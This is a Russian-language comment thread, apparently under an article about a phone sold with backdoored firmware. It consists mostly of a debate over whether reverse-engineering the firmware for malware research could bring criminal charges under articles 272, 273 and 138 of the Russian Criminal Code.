Это первая версия прошивки, от 10 октября 2018. Я скачал и установил её для исследования и подтверждения вредоносной активности. Телефоны с этой прошивкой поставлялись в магазины — я связался с человеком из статьи на tjournal, он подтвердил, что не перепрошивал и ничего дополнительного не делал со своим телефоном, а купил его уже с бэкдором. Мой телефон из магазина шёл с обновлённой версией прошивки от 21 ноября 2019.
На всех других аппаратах прошивки не менялись.
Отзыв о телефоне в DNS от 23.11.2019:
Отзыв от 17.05.2019:
Lepidozavr
Если мы говорим про исследование для целей правового восстановления справедливости, это бы нам не помогло.
Smashrock
В ФСБ уже написал. Ответили, что информация будет использоваться в оперативной работе - мда, хз, что бы это значило. Попросил добавить ещё домен, который вы нашли, в некоторые чёрные листы доменов.
Спасибо вам, что обнаружили и написали про это!!
pvp
Скорее, 272/273 возбудят на топикстартера за "несанкционированный доступ" к прошивкам телефонов. :) Это не шутка, прецеденты были.
RiddickABSent
И будут)
Нужно было остановиться на детализации, что сообщение ушло.
vikarti
Или за имитатор базовой для перехвата. Лицензии на частоты же нет.
KislyFan
Мощность такого оборудования измеряется в милливатах, этого хватит максимум на реализацию "hot spot", чтобы телефон мог закемпиться на сектор. Никакой хоть сколько-нибудь ощутимой интерференции это не создаст.
И кстати OpenBTS и его форки это вполне себе полноценная базовая станция по 3GPP с одним сектором и одним передатчиком. На оффсайте можно посмотреть кейсы с примерами успешного коммерческого использования.
hedger
Есть ст. 1280 ГК РФ, в которой описаны кейсы, когда можно легально выполнять обратную разработку ПО. Кейс автора подтягивается под них.
pvp
Ментам это расскажите, которые такие дела возбуждают. И судьям, которые рассматривают.
KislyFan
Примеры дел есть? Фамилии, Имена, предьявленные обвинения, решения судов?
pvp
https://sudact.ru/regular/doc/N7U9CWqWChdS/
https://sudact.ru/regular/doc/EOr66JgzPBlR/
https://sudact.ru/regular/doc/N7U9CWqWChdS/
https://pravobez.ru/zakonodatelstvo/telefonnyy-spravochnik-ekaterinburga/resheniya-gorodskih-rayonnyh-sudov/Prigovor-suda-po-ch-2-st-272-UK-RF--256599.html
https://pravorub.ru/articles/48680.html
И так далее
KislyFan
Неубедительно. Чипирование и кряки это все таки пиратство.
pvp
"Пиратство" -- это ст. 146 УК, а не 272
tormozedison
А обход DRM (ТСЗАП) — вполне 272.
Popadanec
Или 273 создание программ для обхода. Турьма.
tormozedison
Там обход DRM на чужом устройстве за вознаграждение. За это в любой стране мира привлечь могут. У вас же случай сложный. С одной стороны, поиск малвари — 1280 в чистом виде. Любой антивирус, в конце концов, то же самое и делает. С другой — если припомнят пираченный Miracle Box, технически окажутся правы.
pvp
И что? В данном случае 272/273 статьи вменяются именно за изменение прошивки устройства, выполненное его хозяином или по просьбе хозяина. Никакой разницы -- телефон или приставка, в данном случае нет. Были массовые дела именно за телефоны в середине двухтысячных: https://mobile-review.com/articles/2005/turma.shtml Но сейчас просто двигают этот процесс представители производителей прошивок, которые заинтересованы в "борьбе с пиратством".
tormozedison
Разница в цели. Обход DRM запрещён — значит, доступ к компьютерной информации был неправомерным. Смена IMEI запрещена — аналогично. Даже без смены IMEI замена прошивки на другую версию — откуда она? До AOSP'а в 2005 году ох, как далеко было, опенсорсных прошивок вообще не существовало — пираченная, стало быть. А поиск малвари разрешён (1280), и этим занимается любой антивирус — доступ правомерный.
А ещё когда ту статью писали, телефоны ещё были предметами сертификации вместе с прошивкой. Хоть один байт отличался от эталонного — телефон считался более несертифицированным — пользоваться запрещено.
pvp
"Обход DRM" -- это гражданский деликт, предусмотренный ст. 1299 ГК. С "доступом к информации" он не имеет ничего общего. Вообще, закон об информации и ГК4Ч регулируют разные правоотношения, которые друг с другом не пересекаются. Подмена "доступа к информации" на действия с произведением, охраняемым АП -- это, собственно, основа такой вот натяжки совы на глобус и фабрикации 272/273.
"Смена IMEI запрещена — аналогично" -- каким нормативным актом она запрещена?
"опенсорсных прошивок вообще не существовало — пираченная, стало быть" -- если прошивка "пираченная", претензии должен предъявлять правообладатель, а не дядя мент.
tormozedison
В 2005 году телефоны были объектами сертификации вместе с ПО. FOTA (если бы тогда уже была) — нельзя. «Эльфы для Сименсов» — нельзя, но всем было пофиг. JAR и SIS — под вопросом, ибо несертифицированный код на подлежащем сертификации телефоне, а это был большой бизнес. Из-за которого, вероятно, сертификацию телефонов и ПО для них и отменили. И да, если в наши дни подшаманить прошивку ККМ или электросчётчика, последствия будут как в 2005-м с телефоном.
Для 146 нужно преодолеть порог ущерба. Раньше был 50 тысяч, теперь 100, если потом ещё не поднимали. Для 272 же — всё сходится. Информация — да. Компьютерная — да. Доступ — да. Неправомерный — да (обход DRM, пираченная прошивка, «рассертификация», когда это было ещё важно, и т.п.). А если поиск малвари — то на трёх входах этого элемента «И» — единицы, на четвёртом — нуль, так как 1280, и доступ правомерный. Антивирус на Android тоже гуляет по всей файловой системе, в т.ч. read-only областям. Если вредонос в прошивке, а рута нет — не исправит, но гаркнет всё равно. В кнопчном то же самое, но антивирус некуда ставить. Разница исключительно в том, что исследование происходит снаружи.
Но! Программа Miracle Box — ДСП. По замыслу разработчиков, она не должны была выйти за пределы телефоносборочного завода. А вышла, и доступ к ней — 272.
Это как обезвредить маньяка, догнав его на машине без номеров.
pvp
Сертификация -- это подтверждение соответствия определенным требованиям. Каким образом сертификация препятствует владельцу устройства изменить его прошивку? Ну, получит он "несертифицированный" телефон, но "неправомерный доступ" откуда тут возьмется? Любой доступ, совершаемый обладателем информации, который, к тому же, еще и оператор ИС -- правомерный по определению.
"обход DRM, пираченная прошивка" -- это все запрещено ГК. И не образует "неправомерного доступа". Доступ к информации и обход средств защиты авторских прав -- регулируются разными законами и по разным правилам. Закон об информации все-таки почитайте уже.
tormozedison
Неправомерный доступ — значит, совершённый при отсутствии права на него. В 272 не сказано, чем определяется наличие или отсутствие такого права. Значит, оно может определяться не только законом «Об информации», но и другим законодательным актом, например, ГК.
pvp
"Федеральный закон от 27 июля 2006 г. N 149-ФЗ "Об информации, информационных технологиях и о защите информации"
Статья 1. Сфера действия настоящего Федерального закона
...
2. Положения настоящего Федерального закона не распространяются на отношения, возникающие при правовой охране результатов интеллектуальной деятельности и приравненных к ним средств индивидуализации, за исключением случаев, предусмотренных настоящим Федеральным законом."
ГК:
"Статья 1259. Объекты авторских прав
...
6. Не являются объектами авторских прав:
...
4) сообщения о событиях и фактах, имеющие исключительно информационный характер (сообщения о новостях дня, программы телепередач, расписания движения транспортных средств и тому подобное)."
Итого: правомерность доступа к информации не может "определяться ГК", у них сферы регулирования разделены.
tormozedison
Но 272 не ссылается ни на закон «Об информации», ни на ГК, стало быть, наличие или отсутствие права доступа может определяться любым законодательным актом. Вот если прошивка электросчётчика или ККМ подшаманена для обсчёта в пользу владельца, это явно 272.
pvp
"УК РФ Статья 272. Неправомерный доступ к компьютерной информации"
Само название как бы намекает нам, что речь идет об информации, которую ГК не регулирует.
LuggerMan
реверсить для выявления явных ошибок можно! детализация как повод
Arioch
По здравому смыслу (не знаю как по юридическому) - это когда ВАШИ сообщения (СМСки, разговоры и т.д.) читают и передают на сторону.
В данном же случае телефон от вашего лица (вашего номера) творит отсебятину. НО, ваши разговоры он никуда не передаёт. Тут, в западной терминологии, наверное можно найти identity theft (в случае с "бабушкой Шурой"), но никакого "нарушения тайны" пока не видно.
Кроме того, а много ли прецедентов, когда за "нарушение тайны" реально преследовали? Ведь интерес в таких прецедентах у правоохранителей отрицательный: им СОРМ и Deep Inspection с Великим Фаерволлом нужнее.
Chamie
Arioch
Интересный аргумент, в самом деле.
Скользкий вопрос, впрочем, можно ли это считать ВАШИМ сообщением, если оно приходит для меня и по моему запросу, хотя я и использую для своих целей ваш адрес?
Вот представим себе дропшипперов, которые предоставляют локальный адрес, чтобы из локальных магазинов привозили товары с доставкой, перед их пересылкой "через море". Они же не приобретают права на сами посылки при этом. Теперь представьте, что я как-то вас надурил, и вашим домом пользуюсь как своим складом, бесплатно и без вашего ведома. Даёт ли моё преступление вам право потрошить мои посылки?..
Chamie
santjagocorkez
Будет очень весело. После доказательства в уголовном суде, что никакого нарушения тайны связи не было, потому что сообщение предназначалось не держателю SIM-карты, а обвиняемому, уголовное дело по ст. "Нарушение тайны связи" закрывается... и открывается новое по ст. 273 УК РФ, возможно, в соединении со ст. 272 УК РФ. Причем, материалы предыдущего уголовного дела будут иметь преюдициальную силу, поскольку факты установлены судом (более того, на таковой трактовке фактов настаивал сам привлекаемый по новому УД), решение которого вступило в законную силу.
Arioch
а разве до того статьи 272/273 уже не было?
использование спец-программ, чтобы читать ваши СМС и при этом не давать вам про них узнать - это разве не подпадает под "блокирование" из 273
в общем, хуже уже не будет, но хоть "тайну связи" срезать :-)
santjagocorkez
Дело в том, что в описанном сценарии, чтобы "отменить" тайну связи, надо фактически сделать явку с повинной, причём, прямо в судебном заседании. Иными словами:
138 и/или 272 и/или 273 и всё это следствию и гособвинителю надо еще доказать (понимаю, что с этим даже при отсутствии фактуры иногда проблем никаких нет)
отменить 138 через признание 272 и/или 273, и следствию/гособвинителю уже ничего доказывать не надо, более того, никакой сделки с правосудием или аналогичного принципа из УПК тут даже близко нет, это даже не считается сотрудничеством со следствием
В общем, какой-то Эскобар, на мой взгляд.
ifap
138 УК (как, впрочем, и 272/273) предполагает прямой умысел, которого в данном случае по 138-й нет, а по 272/273 — есть. Так что перспективу Вы красивую нарисовали, но нереальную.